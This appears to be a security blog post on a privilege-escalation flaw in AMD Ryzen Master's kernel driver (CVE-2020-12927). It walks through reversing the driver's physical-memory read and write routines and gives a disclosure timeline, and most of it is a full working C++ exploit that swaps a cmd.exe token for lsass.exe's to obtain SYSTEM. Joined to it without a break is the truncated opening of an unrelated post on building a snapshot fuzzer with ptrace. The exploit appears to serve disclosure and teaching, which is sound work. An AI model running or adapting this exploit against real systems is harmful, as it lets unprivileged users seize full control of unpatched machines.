The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.

Luckily for me, Device Tree indicated that the driver allowed all Authenticated Users to read and modify the driver.

Finding Interesting IOCTL Routines

Write What Where Routine

Next, I started looking at the driver in in a free version of IDA. A search for MmMapIoSpace returned quite a few places in which the api was cross referenced. I just began going down the list to see what code paths could reach these calls.

The first result, sub_140007278, looked very interesting to me.

We don’t know at this point if we control the API parameters in this routine but looking at the routine statically you can see that we make our call to MmMapIoSpace, it stores the returned pointer value in [rsp+48h+BaseAddress] and does a check to make sure the return value was not NULL. If we have a valid pointer, we then progress into this loop routine on the bottom left.

At the start of the looping routine, we can see that eax gets the value of dword ptr [rsp+48h+NumberOfBytes] and then we compare eax to [rsp+48h+var_24]. This makes some sense because we already know from looking at the API call that [rsp+48h+NumberOfBytes] held the NumberOfBytes parameter for MmMapIoSpace. So essentially what this is looking like is, a check to see if a counter variable has reached our NumberOfBytes value. A quick highlight of eax shows that later it takes on the value of [rsp+48h+var_24], is incremented, and then eax is put back into [rsp+48h+var_24]. Then we’re back at the top of our loop where eax is set equal to NumberOfBytes before every check.

So this to me looked interesting, we can see that we’re doing something in a loop, byte by byte, until our NumberOfBytes value is reached. Once that value is reached, we see the other branch in our loop when our NumberOfBytes value is reached is a call to MmUnmapIoSpace.

Looking a bit closer at the loop, we can see a few interesting things. ecx is essentially a counter here as its set equal to our already mentioned counters eax and [rsp+48h+var_24]. We also see there is a mov to [rdx+rcx] from al. A single byte is written to the location of rdx + rcx. So we can make a guess that rdx is a base address and rcx is an offset. This is what a traditional for loop would seem to look like disassembled. al is taken from another similar construction in [r8+rax] where rax is now acting as the offset and r8 is a different base address.

So all in all, I decided this looks like a routine that is either doing a byte by byte read or a byte by byte write to kernel memory most likely. But if you look closely, you can see that the pointer returned from MmMapIoSpace is the one that al is written to (while tracking an offset) because it is eventually moved into rdx for the mov [rdx+rcx], al operation. This was exciting for me because if we can control the parameters of MmMapIoSpace, we will possibly be able to specify a physical memory address and offset and copy a user controlled buffer into that space once it is mapped into our process space. This is essentially a write what where primitive!

Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.

After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of my input and output buffers supplied to my DeviceIoControl call. I was able to solve this by simply stringing together random length buffers of something like AAAAAAAABBBBBBBBCCCCCCCC etc, and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:

first 8 bytes of my input buffer would be the desired physical address you want mapped,
the next 4 bytes would represent the NumberOfBytes parameter,
and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.

Very cool! We have control over all the MmMapIoSpace params except CacheType and we can specify what buffer to copy over!

This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).

Read What Where

Now I went back to the other cross references of MmMapIoSpace calls and eventually came upon this routine, sub_1400063D0.

You’d be forgiven if you think it looks just like the last routine we analyzed, I know I did and missed it initially; however, this routine differs in one major way. Instead of copying byte by byte out of our process space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process space buffer. I will spare you the technical analysis here but it is essentially our other routine except only the source and destinations are reversed! This is our read what where primitive and I was able to back track a cross reference in IDA to this IOCTL.

There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.

Once again, we control the important MmMapIoSpace parameters and, this is a difference from the other IOCTL, the byte by byte transfer occurs in our DeviceIoControl output buffer argument at an offset of 0xC bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!

With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.

Exploitation

Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)

First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for "Proc" tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes are stored in the EPROCESS structure in the kernel and some of the important members for our purposes are:

ImageFileName (this is the name of the process)
UniqueProcessId (the PID)
Token (this is a security token value)

The offsets from the beginning of the structure to these members was as follows on my build:

0x2e8 to the UniqueProcessId
0x360 to the Token
0x450 to the ImageFileName

You can see the offsets in WinDBG:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

Each data structure in the kernel pool has various headers, (thanks to ReWolf for breaking this down so well):

POOL_HEADER structure (this is where our "Proc" tag will reside),
OBJECT_HEADER_xxx_INFO structures,
OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

As b33f explains, in his write-up, all of the addresses where one begins looking for a "Proc" tag are 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a "Proc" tag might be.

Leveraging Read What Where

The difficulty on my Windows build was that the length from my "Proc" tag once found, to the beginning of the EPROCESS structure where I know the offsets to the members I want varied wildly. So much so that in order to get the exploit working reliably, I just simply had to create my own data structure and store instances of them in a vector. The data structure was as follows:

struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

So as I’m using our Read What Where primitive to blow through all the RAM hunting for "Proc", if I find an instance of "Proc" I’ll iterate 0x10 bytes at a time until I find a marker signifying the end of our pool headers and the beginning of EPROCESS. This marker was 0x00B80003. So now, I’ll have the proc_address the literal place where "Proc" was and store that in PROC_DATA.proc_address, I’ll also annotate how far that address was from the nearest page-aligned memory address (a multiple of 0x1000) in PROC_DATA.proc_address and also annotate how far from "Proc" it was until we reached our marker or the beginning of EPROCESS in PROC.header_size. These will all be stored in a vector.

You can see this routine here:

INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }

It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address, and calling our read what where with a read size of 0x100c (0x1000 + 0xc as required so we can capture a whole page of memory and still keep our returned metadata information that starts at offset 0xc in our output buffer) in a loop all the while adding these discovered PROC_DATA structures to a vector. Once we hit our max address or max iterations, we’ll send this vector over to a second routine that parses out all the data we care about like the EPROCESS members we care about.

It is important to note that I took great care to make sure that all calls to MmMapIoSpace used page-aligned physical addresses as this is the most stable way to call the API

Now that I knew exactly how many "Proc" chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their EPROCESS member values to see if they were processes I cared about.

My strategy here was to find the EPROCESS members for a privileged process such as lsass.exe and swap its security token with the security token of a cmd.exe process that I owned. You can see a portion of that code here:

INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }

So now at this point I had the location and values of every thing I cared about and it was time to leverage the Write What Where routine we had found.

Leveraging Write What Where

The problem I was facing was that I need my calls to MmMapIoSpace to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.

So let’s picture a page of memory as a line.

<—————–MEMORY PAGE—————–>

We can only write in page-size chunks; however, the value we want to overwrite, the value of the cmd.exe process’s Token, is most-likely not page-aligned. So now we have this:

<———TOKEN——————————->

I could do a direct write at the exact address of this Token value, but my call to MmMapIoSpace would not be page-aligned.

So what I did was one more Read What Where call to store everything on that page of memory in a buffer and then overwrite the cmd.exe Token with the lsass.exe Token and then use that buffer in my call to the Write What Where routine.

So instead of an 8 byte write to simply overwrite the value, I’d be opting to completely overwrite that entire page of memory but only changing 8 bytes, that way the calls to MmMapIoSpace stay clean.

You can see some of that math in the code snippet below with references to modulus. Remember that the Write What Where utilized the input buffer of DeviceIoControl as the buffer it would copy over into the kernel memory:

if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }

Final Results

You can see the mandatory full exploit screenshot below:

Disclosure Timeline

Big thanks to Tod Beardsley at Rapid7 for his help with the disclosure process!

1 May 2020: Vendor notified of vulnerability
1 May 2020: Vendor acknowledges vulnerability
18 May 2020: Vendor supplies patch, restricting driver access to Administrator group
18 May 2020 - 11 July 2020: Back and forth about CVE assignment
23 Aug 2020 - CVE-2020-12927 assigned
13 Oct 2020 - Joint Disclosure

Exploit Proof of Concept

#include <iostream>
#include <vector>
#include <chrono>
#include <iomanip>
#include <Windows.h>
using namespace std;

#define DEVICE_NAME         "\\\\.\\AMDRyzenMasterDriverV15"
#define WRITE_IOCTL         (DWORD)0x81112F0C
#define READ_IOCTL          (DWORD)0x81112F08
#define START_ADDRESS       (INT64)0x100000000
#define STOP_ADDRESS        (INT64)0x240000000

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    //0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    //0x6578652e73736d73,         // smss.exe
    //0x7365636976726573,         // services.exe
    //0x6b6f72426d726753,         // SgrmBroker.exe
    //0x2e76736c6f6f7073,         // spoolsv.exe
    //0x6e6f676f6c6e6977,         // winlogon.exe
    //0x2e74696e696e6977,         // wininit.exe
    //0x6578652e736d6c77,         // wlms.exe
};

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    PBYTE write_buff;
} WRITE_INPUT_BUFFER;

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    char receiving_buff[0x1000];
} READ_INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag's page entry, 
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

struct SYSTEM_TOKENS {
    std::vector<INT64> token_name;
    std::vector<INT64> token_value;
} system_tokens;

INT64 cmd_token_address = 0;

HANDLE grab_handle(const char* device_name) {

    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to " << DEVICE_NAME << "\n";
        exit(1);
    }
    else
    {
        cout << "[>] Grabbed handle 0x" << hex
            << (INT64)hFile << "\n";

        return hFile;
    }
}

PROC_DATA read_mem(HANDLE hFile) {

    cout << "[>] Reading through RAM for Proc tags...\n";
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    PROC_DATA proc_data;

    int proc_count = 0;
    INT64 iteration = 0;
    while (true) {

        INT64 start_address = START_ADDRESS + (0x1000 * iteration);
        if (start_address >= 0x240000000) {
            cout << "\n[>] Max address reached.\n";
            cout << "[>] Number of iterations: " << dec << iteration << "\n";
            return proc_data;
        }

        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        DWORD bytes_ret = 0;

        //cout << "[>] User buffer allocated at: 0x" << hex << output_buff << "\n";
        //Sleep(500);

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        iteration++;

        //DebugBreak();
        INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }
    }
}

void parse_procs(PROC_DATA proc_data, HANDLE hFile) {

    int system_token_count = 0;
    DWORD bytes_ret = 0;
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.header_size.size(); i++) {

        INT64 start_address = proc_data.proc_address[i];
        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }
}

void write(HANDLE hFile) {

    DWORD modulus = cmd_token_address % 0x1000;
    INT64 cmd_page = cmd_token_address - modulus;
    DWORD bytes_ret = 0x0;
    DWORD read_num_bytes = modulus;

    PBYTE output_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0xc,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    READ_INPUT_BUFFER input_buff = { cmd_page, read_num_bytes };

    if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }
}

int main()
{
    srand((unsigned)time(0));
    HANDLE hFile = grab_handle(DEVICE_NAME);

    PROC_DATA proc_data = read_mem(hFile);

    cout << "\n[>] Parsing procs...\n";
    parse_procs(proc_data, hFile);

    write(hFile);
}

Fuzzing Like A Caveman 4: Snapshot/Code Coverage Fuzzer!

The Human Machine Interface

h0mbre

13 June 2020 at 04:00

Introduction

Last time we blogged, we had a dumb fuzzer that would test an intentionally vulnerable program that would perform some checks on a file and if the input file passed a check, it would progress to the next check, and if the input passed all checks the program would segfault. We discovered the importance of code coverage and how it can help reduce exponentially rare occurences during fuzzing into linearly rare occurences. Let’s get right into how we improved our dumb fuzzer!

Big thanks to @gamozolabs for all of his content that got me hooked on the topic.

Performance

First things first, our dumb fuzzer was slow as hell. If you remember, we were averaging about 1,500 fuzz cases per second with our dumb fuzzer. During my testing, AFL in QEMU mode (simulating not having source code available for compilation instrumentation) was hovering around 1,000 fuzz cases per second. This makes sense, since AFL does way more than our dumb fuzzer, especially in QEMU mode where we are emulating a CPU and providing code coverage.

Our target binary (-> HERE <-) would do the following:

extract the bytes from a file on disk into a buffer
perform 3 checks on the buffer to see if the indexes that were checked matched hardcoded values
segfaulted if all checks were passed, exit if one of the checks failed

Our dumb fuzzer would do the following:

extract bytes from a valid jpeg on disk into a byte buffer
mutate 2% of the bytes in the buffer by random byte overwriting
write the mutated file to disk
feed the mutated file to the target binary by executing a fork() and execvp() each fuzzing iteration

As you can see, this is a lot of file system interactions and syscalls. Let’s use strace on our vulnerable binary and see what syscalls the binary makes (for this post, I’ve hardcoded the .jpeg file into the vulnerable binary so that we don’t have to use command line arguments for ease of testing):

execve("/usr/bin/vuln", ["vuln"], 0x7ffe284810a0 /* 52 vars */) = 0
brk(NULL)                               = 0x55664f046000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=88784, ...}) = 0
mmap(NULL, 88784, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f0793d2e000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0793d2c000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f079372c000
mprotect(0x7f0793913000, 2097152, PROT_NONE) = 0
mmap(0x7f0793b13000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7f0793b13000
mmap(0x7f0793b19000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f0793b19000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7f0793d2d500) = 0
mprotect(0x7f0793b13000, 16384, PROT_READ) = 0
mprotect(0x55664dd97000, 4096, PROT_READ) = 0
mprotect(0x7f0793d44000, 4096, PROT_READ) = 0
munmap(0x7f0793d2e000, 88784)           = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL)                               = 0x55664f046000
brk(0x55664f067000)                     = 0x55664f067000
write(1, "[>] Analyzing file: Canon_40D.jp"..., 35[>] Analyzing file: Canon_40D.jpg.
) = 35
openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
fstat(3, {st_mode=S_IFREG|0644, st_size=7958, ...}) = 0
lseek(3, 4096, SEEK_SET)                = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 3862) = 3862
lseek(3, 0, SEEK_SET)                   = 0
write(1, "[>] Canon_40D.jpg is 7958 bytes."..., 33[>] Canon_40D.jpg is 7958 bytes.
) = 33
read(3, "\377\330\377\340\0\20JFIF\0\1\1\1\0H\0H\0\0\377\341\t\254Exif\0\0II"..., 4096) = 4096
read(3, "\v\260\v\310\v\341\v\371\f\22\f*\fC\f\\\fu\f\216\f\247\f\300\f\331\f\363\r\r\r&"..., 4096) = 3862
close(3)                                = 0
write(1, "[>] Check 1 no.: 2626\n", 22[>] Check 1 no.: 2626
) = 22
write(1, "[>] Check 2 no.: 3979\n", 22[>] Check 2 no.: 3979
) = 22
write(1, "[>] Check 3 no.: 5331\n", 22[>] Check 3 no.: 5331
) = 22
write(1, "[>] Check 1 failed.\n", 20[>] Check 1 failed.
)   = 20
write(1, "[>] Char was 00.\n", 17[>] Char was 00.
)      = 17
exit_group(-1)                          = ?
+++ exited with 255 +++

You can see that during the process of the target binary, we run plenty of code before we even open the input file. Looking through the strace output, we don’t even open the input file until we’ve run the following syscalls:

execve
brk
access
access
openat
fstat
mmap
close
access
openat
read
opeant
read
fstat
mmap
mmap
mprotect
mmap
mmap
arch_prctl
mprotect
mprotect
mprotect
munmap
fstat
brk
brk
write

After all of those syscalls, we finally open the file from the disk to read in the bytes with this line from the strace output:

openat(AT_FDCWD, "Canon_40D.jpg", O_RDONLY) = 3

So keep in mind, we run these syscalls every single fuzz iteration with our dumb fuzzer. Our dumb fuzzer (-> HERE <-) would write a file to disk every iteration, and spawn an instance of the target program with fork() + execvp(). The vulnerable binary would run all of the start up syscalls and finally read in the file from disk every iteration. So thats a couple dozen syscalls and two file system interactions every single fuzzing iteration. No wonder our dumb fuzzer was so slow.

Rudimentary Snapshot Mechanism

I started to think about how we could save time when fuzzing such a simple target binary and thought if I could just figure out how to take a snapshot of the program’s memory after it had already read the file off of disk and had stored the contents in its heap, I could just save that process state and manually insert a new fuzzcase in the place of the bytes that the target had read in and then have the program run until it reaches an exit() call. Once the target hits the exit call, I would rewind the program state to what it was when I captured the snapshot and insert a new fuzz case and then do it all over again.

You can see how this would improve performance. We would skip all of the target binary startup overhead and we would completely bypass all file system interactions. A huge difference would be we would only make one call to fork() which is an expensive syscall. For 100,000 fuzzing iterations let’s say, we’d go from 200,000 filesystem interactions (one for the dumb fuzzer to create a mutated.jpeg on disk, one for the target to read the mutated.jpeg) and 100,000 fork() calls to 0 file system interactions and only the initial fork().

In summary, our fuzzing process should look like this:

Start target binary, but break on first instruction before anything runs
Set breakpoints on a ‘start’ and ‘end’ location (start will be after the program reads in bytes from the file on disk, end will be the address of exit())
Run the program until it hits the ‘start’ breakpoint
Collect all writable memory sections of the process in a buffer
Capture all register states
Insert our fuzzcase into the heap overwriting the bytes that the program read in from file on disk
Resume target binary until it reaches ‘end’ breakpoint
Rewind process state to where it was at ‘start’
Repeat from step 6

We are only doing steps 1-5 only once, so this routine doesn’t need to be very fast. Steps 6-9 are where the fuzzer will spend 99% of its time so we need this to be fast.

Writing a Simple Debugger with Ptrace

In order to implement our snapshot mechanism, we’ll need to use the very intuitive, albeit apparently slow and restrictive, ptrace() interface. When I was getting started writing the debugger portion of the fuzzer a couple weeks ago, I leaned heavily on this blog post by Eli Bendersky which is a great introduction to ptrace() and shows you how to create a simple debugger.

Breakpoints

The debugger portion of our code doesn’t really need much functionality, it really only needs to be able to insert breakpoints and remove breakpoints. The way that you use ptrace() to set and remove breakpoints is to overwrite a single-byte instruction at at an address with the int3 opcode \xCC. However, if you just overwrite the value there while setting a breakpoint, it will be impossible to remove the breakpoint because you won’t know what value was held there originally and so you won’t know what to overwrite \xCC with.

To begin using ptrace(), we spawn a second process with fork().

pid_t child_pid = fork();
if (child_pid == 0) {
    //we're the child process here
    execute_debugee(debugee);
}

Now we need to have the child process volunteer to be ‘traced’ by the parent process. This is done with the PTRACE_TRACEME argument, which we’ll use inside our execute_debugee function:

// request via PTRACE_TRACEME that the parent trace the child
long ptrace_result = ptrace(PTRACE_TRACEME, 0, 0, 0);
if (ptrace_result == -1) {
    fprintf(stderr, "\033[1;35mdragonfly>\033[0m error (%d) during ", errno);
    perror("ptrace");
    exit(errno);
}

The rest of the function doesn’t involve ptrace but I’ll go ahead and show it here because there is an important function to forcibly disable ASLR in the debuggee process. This is crucial as we’ll be leverage breakpoints at static addresses that cannot change process to process. We disable ASLR by calling personality() with ADDR_NO_RANDOMIZE. Separately, we’ll route stdout and stderr to /dev/null so that we don’t muddy our terminal with the target binary’s output.

// disable ASLR
int personality_result = personality(ADDR_NO_RANDOMIZE);
if (personality_result == -1) {
